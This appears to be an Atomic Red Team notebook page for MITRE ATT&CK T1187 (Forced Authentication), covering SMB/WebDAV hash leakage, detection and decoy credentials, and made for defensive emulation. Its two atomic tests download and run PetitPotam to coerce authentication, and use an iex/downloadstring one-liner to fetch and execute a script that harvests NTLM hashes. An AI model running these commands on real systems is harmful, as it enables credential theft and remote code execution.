# T1187 - Forced Authentication
Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept.

The Server Message Block (SMB) protocol is commonly used in Windows networks for authentication and communication between systems for access to resources and file sharing. When a Windows system attempts to connect to an SMB resource it will automatically attempt to authenticate and send credential information for the current user to the remote system. (Citation: Wikipedia Server Message Block) This behavior is typical in enterprise environments so that users do not need to enter credentials to access network resources.

Web Distributed Authoring and Versioning (WebDAV) is also typically used by Windows systems as a backup protocol when SMB is blocked or fails. WebDAV is an extension of HTTP and will typically operate over TCP ports 80 and 443. (Citation: Didier Stevens WebDAV Traffic) (Citation: Microsoft Managing WebDAV Security)

Adversaries may take advantage of this behavior to gain access to user account hashes through forced SMB/WebDAV authentication. An adversary can send an attachment to a user through spearphishing that contains a resource link to an external server controlled by the adversary (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)), or place a specially crafted file on navigation path for privileged accounts (e.g. .SCF file placed on desktop) or on a publicly accessible share to be accessed by victim(s). When the user's system accesses the untrusted resource it will attempt authentication and send information, including the user's hashed credentials, over SMB to the adversary controlled server. (Citation: GitHub Hashjacking) With access to the credential hash, an adversary can perform off-line [Brute Force](https://attack.mitre.org/techniques/T1110) cracking to gain access to plaintext credentials. (Citation: Cylance Redirect to SMB)

There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:

* A spearphishing attachment containing a document with a resource that is automatically loaded when the document is opened (i.e. [Template Injection](https://attack.mitre.org/techniques/T1221)). The document can include, for example, a request similar to <code>file[:]//[remote address]/Normal.dotm</code> to trigger the SMB request. (Citation: US-CERT APT Energy Oct 2017)
* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as <code>\\[remote address]\pic.png</code> that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)

## Atomic Tests

### Atomic Test #1 - PetitPotam
This module runs the Windows executable of PetitPotam in order to coerce authentication for a remote system.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: PetitPotam binary must exist on disk and at specified location (#{petitpotam_path}).
And the computer must be domain joined (implicit authentication).

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe") { exit 0 } else { exit 1 }

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory "PathToAtomicsFolder\..\ExternalPayloads\" -ErrorAction Ignore -Force | Out-Null
Invoke-WebRequest "https://github.com/topotam/PetitPotam/blob/2ae559f938e67d0cd59c5afcaac67672b9ef2981/PetitPotam.exe?raw=true" -OutFile "PathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe"

```

In [ ]:
Invoke-AtomicTest T1187 -TestNumbers 1 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
& "PathToAtomicsFolder\..\ExternalPayloads\PetitPotam.exe" 10.0.0.3 10.0.0.2 1
Write-Host "End of PetitPotam attack"
```

In [ ]:
Invoke-AtomicTest T1187 -TestNumbers 1

### Atomic Test #2 - WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASSPowerSharpPack - Retrieving NTLM Hashes without Touching LSASS technique via function of WinPwn**Supported Platforms:** windows#### Attack Commands: Run with `powershell`
```powershell
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpBinaries/Invoke-Internalmonologue.ps1')
Invoke-Internalmonologue -command "-Downgrade true -impersonate true -restore true"```

In [ ]:
Invoke-AtomicTest T1187 -TestNumbers 2

## Detection
Monitor for SMB traffic on TCP ports 139, 445 and UDP port 137 and WebDAV traffic attempting to exit the network to unknown external systems. If attempts are detected, then investigate endpoint data sources to find the root cause. For internal traffic, monitor the workstation-to-workstation unusual (vs. baseline) SMB traffic. For many networks there should not be any, but it depends on how systems on the network are configured and where resources are located.

Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)


## Shield Active Defense
### Decoy Credentials 
 Create user credentials that are used for active defense purposes. 

 Seed a target system with credentials (such as username/password, browser tokens, and other forms of authentication data) for the purpose of engagement. Decoy credentials can be planted in many locations and leveraged in a variety of ways.
#### Opportunity
In order to prolong an adversary engagement operation or enable detections, there is an opportunity to introduce credentials to an adversary that you want them to collect and use.
#### Use Case
A defender can use adversary attempts at forced authentication exploits to seed adversary servers with decoy credentials.
#### Procedures
Create user credentials for a decoy account, such as 'User ABC'.  Store those credentials in the browser and other places on the system to see if an adversary attempts to harvest them.
